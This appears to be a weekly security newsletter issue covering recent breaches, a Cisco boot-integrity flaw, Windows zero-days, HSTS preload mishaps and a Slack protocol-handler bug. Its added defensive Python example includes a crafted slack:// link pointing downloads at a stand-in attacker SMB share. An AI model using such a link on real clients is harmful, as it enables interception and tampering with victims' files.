Personal note - regular issue \o/
There might be a few more minimal editions coming up in the next few weeks, please bear with me until I'm back in my regular routine. But I'm really happy that I got to publish a regular newsletter issue this week :-) Enjoy!
Breaches and leaks
- TeamViewer: hackers breached their systems back in 2016, but the company never disclosed it.
- Stack Overflow: an attacker got into their network on May 5th, and roamed around until detected on May 11th.
- Over 12,000 unsecured MongoDB databases have been dropped, with a ransom note left behind in their place. I guess that's one way of getting rid of unsecured databases: link.
- OGUsers: an underground forum used to trade stolen accounts was itself hacked, and the whole database was posted on a rival forum's site. Oh, the irony.
I somehow missed this last week. Maybe I'm getting numb to news articles starting with "security problem in Cisco product". Sarcasm aside, this seems serious.
<Takes deep breath>
There's a vulnerability in Cisco's Trust Anchor module, the hardware root of trust that is supposed to verify the device's firmware at boot. An attacker who already has privileged access on the device can tamper with the boot process and the Trust Anchor will not detect it. There's no patch yet, and once there is one, applying it will require physical access to the device; it can't be done remotely.
Exploiting it requires admin-level access on the device first, and the second disclosed vulnerability provides exactly that: remote admin access. That one does have a patch, which you'll want to apply as soon as possible, since it is the entry point for the whole chain.
There's another summary here, and the researchers' own page here.
The hacker known as SandBoxEscaper, who has previously released Windows zero-days, has been busy this week, releasing no fewer than four zero-days/proof-of-concept exploits. I'm a bit hazy on which are zero days and which are exploits for known vulnerabilities, but either way: if you manage Windows systems you'll want to take a closer look.
Salesforce had a big facepalm moment this week. A change deployed to their production environment gave every employee of an affected customer access to all of that company's data, regardless of the permissions they were supposed to have.
Only customers using Salesforce Pardot were directly affected, but the company took down all Salesforce services for a while to be certain.
There's a slew of companies cutting various ties with Huawei after Trump's executive order. It makes sense, I suppose, to not put critical infrastructure in the hands of a foreign power. But, as this article points out, there's still no evidence of malicious acts, and it would be very risky for China to include backdoors at all.
Google disclosed that some G Suite passwords were stored in plain text. It's not as horrible as the recent similar Facebook stories, but still not great of course. It relates to a feature of G Suite Enterprise where an admin can manually set a password for a user; those admin-set passwords were stored in plain text rather than hashed.
When someone types your domain into their browser without a scheme, the first request usually goes to the plain (unsecured) HTTP endpoint and relies on a redirect to reach HTTPS, which leaves that first request open to interception. If the site is on the HSTS preload list shipped with the browser, the browser knows to go straight to HTTPS, even on the very first visit.
Microsoft shipped an update adding *.gov.uk to that preload list, but not all .gov.uk sites support HTTPS yet, which made them unreachable for the people who got that update. Microsoft pushed another update to fix the issue. The lesson for anyone submitting a domain with includeSubDomains: every subdomain, present and future, has to serve HTTPS, because an entry can't be pulled back quickly from browsers that already shipped it.
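As an added example (not from the newsletter, and not Microsoft's or the preload list's own code), here is the matching rule a preloaded entry with includeSubDomains applies, used to find which hosts would break, plus a check of a Strict-Transport-Security header against the hstspreload.org submission rules (max-age of at least one year, includeSubDomains and preload). The preload list and the host inventory are constructed for illustration.

```python
# Added example: preload matching and eligibility checks (not browser code).
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

ONE_YEAR = 31536000  # seconds; minimum max-age for a preload submission


@dataclass(frozen=True)
class PreloadEntry:
    name: str                 # lower-case domain, no trailing dot
    include_subdomains: bool  # True = every subdomain is forced to HTTPS too


# Constructed sample of a preload list, for illustration only; the real list
# is compiled into the browser.
SAMPLE_PRELOAD_LIST: List[PreloadEntry] = [
    PreloadEntry("gov.uk", include_subdomains=True),
    PreloadEntry("example.org", include_subdomains=False),
]


def hsts_forces_https(host: str, preload_list: Iterable[PreloadEntry]) -> bool:
    """True if the browser rewrites http://host to https://host before the
    first request leaves the machine. An exact entry always matches; a parent
    entry matches only when it carries includeSubDomains."""
    host = host.lower().rstrip(".")
    for entry in preload_list:
        if host == entry.name:
            return True
        if entry.include_subdomains and host.endswith("." + entry.name):
            return True
    return False


def hosts_that_break(https_support: Dict[str, bool],
                     preload_list: Iterable[PreloadEntry]) -> List[str]:
    """Hosts the preload list forces to HTTPS but that do not serve it: these
    become unreachable for every user carrying that list."""
    return sorted(h for h, ok in https_support.items()
                  if hsts_forces_https(h, preload_list) and not ok)


def parse_hsts_header(value: str) -> Dict[str, Optional[str]]:
    """Parse 'max-age=31536000; includeSubDomains; preload' into a dict.
    Directive names are case-insensitive; valueless directives map to None."""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"') if sep else None
    return directives


def preload_eligible(header_value: str) -> bool:
    """Check a header against the hstspreload.org submission requirements."""
    d = parse_hsts_header(header_value)
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        return False
    return (int(max_age) >= ONE_YEAR
            and "includesubdomains" in d
            and "preload" in d)


if __name__ == "__main__":
    # Constructed inventory of which hosts under the preloaded parent serve
    # HTTPS; in practice this comes from a scan of all your subdomains.
    inventory = {
        "www.gov.uk": True,
        "legacy.gov.uk": False,
        "intranet.example.org": False,  # parent has no includeSubDomains
    }
    print("would break:", hosts_that_break(inventory, SAMPLE_PRELOAD_LIST))
    print(preload_eligible("max-age=31536000; includeSubDomains; preload"))
    print(preload_eligible("max-age=86400; includeSubDomains"))
```

Run the inventory check over a full subdomain enumeration before submitting a parent domain; anything `hosts_that_break` reports is a site that goes dark the moment browsers pick up the entry.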
Mixing services are used to launder cryptocurrency: coins are shuffled between many wallets, currencies and accounts so that law enforcement can't trace them back to the attackers. One of the bigger ones, Bestmixer, has been taken down by Europol, in collaboration with Dutch and Luxembourg authorities and McAfee.
Google performed research to see just how effective their account security measures are in practice. It turns out that an SMS verification code sent to the account's phone stops 100% of automated bots, 96% of bulk phishing attacks and 76% of targeted attacks. As you'd expect, the numbers go up even further if you move to non-SMS based 2FA like on-device prompts and security keys.
I recently shared an article on this topic, but I had no idea they were actually working on this already. If you're a US citizen with infosec skills, and if you can qualify for a security clearance, you can sign up as a cybersecurity volunteer with the US Marine Corps (USMC).
The issue has been patched, but I did find it an interesting read. The vulnerability was in the slack:// protocol handler: a crafted link could change the client's download location, and an attacker could point it at an SMB share they control. From then on anything the user downloads lands on the attacker's share, the victim still opens the attachment from there, streamed from the attacker's SMB server, and the attacker gets to read or modify the file before they do.
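As an added example (my own, not Slack's code), here is the weak pattern behind a protocol-handler bug of this kind next to a hardened version: a settings change that arrives in a URL is applied without validation, versus one that rejects UNC paths, relative paths and anything outside the local download directory. The URL shape (`slack://settings?download_path=...`), the parameter name, the settings key and the default directory are assumptions for illustration, not the real client's names.

```python
# Added example, not Slack's code: vulnerable vs. hardened handling of a
# download-path setting delivered through a custom protocol link.
from pathlib import PureWindowsPath
from typing import Dict
from urllib.parse import parse_qs, urlparse

# Constructed default: the directory downloads are allowed to land in.
DEFAULT_DOWNLOAD_DIR = PureWindowsPath(r"C:\Users\alice\Downloads")


def _settings_params(url: str) -> Dict[str, list]:
    """Parse a slack://settings?... link (assumed shape) into its parameters."""
    parsed = urlparse(url)
    if parsed.scheme != "slack" or parsed.netloc != "settings":
        raise ValueError("not a settings link")
    return parse_qs(parsed.query)


def vulnerable_handle(url: str, settings: Dict[str, str]) -> Dict[str, str]:
    """Apply the change without looking at it. Anything clickable (a message,
    a web page) can now redirect every future download to an attacker path."""
    params = _settings_params(url)
    if "download_path" in params:
        settings["download_path"] = params["download_path"][0]
    return settings


def is_unsafe_download_path(candidate: str, base: PureWindowsPath) -> bool:
    """Reject UNC paths (\\host\share, which make the client write to and read
    from a remote SMB server), relative paths, '..' traversal and anything
    outside the allowed base directory."""
    p = PureWindowsPath(candidate)
    if p.drive.startswith("\\\\"):       # UNC drive such as \\attacker\share
        return True
    if not p.is_absolute() or ".." in p.parts:
        return True
    try:
        p.relative_to(base)
    except ValueError:                   # on another drive or outside base
        return True
    return False


def hardened_handle(url: str, settings: Dict[str, str],
                    base: PureWindowsPath = DEFAULT_DOWNLOAD_DIR) -> Dict[str, str]:
    """Same link shape, but the new path must stay inside the local download
    directory. A real client should additionally prompt the user before
    applying any settings change that arrives through a URL."""
    params = _settings_params(url)
    if "download_path" in params:
        candidate = params["download_path"][0]
        if is_unsafe_download_path(candidate, base):
            raise ValueError(f"refusing download path {candidate!r}")
        settings["download_path"] = str(PureWindowsPath(candidate))
    return settings


if __name__ == "__main__":
    # Constructed attacker link: %5C is a backslash, so this is \\attacker\share.
    evil = "slack://settings?download_path=%5C%5Cattacker%5Cshare"
    print(vulnerable_handle(evil, {}))  # silently accepts the SMB share
    try:
        hardened_handle(evil, {})
    except ValueError as exc:
        print(exc)
```

The UNC check is the one that matters for this bug; the traversal and base-directory checks are there because once a path comes from an untrusted link, every other way of escaping the sandboxed location has to be closed too.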
A fun project to browse through: a catalogue of hardware that can be useful to red teamers and pentesters. The links don't seem to point anywhere that I can see; you'll want to go straight to the PDF.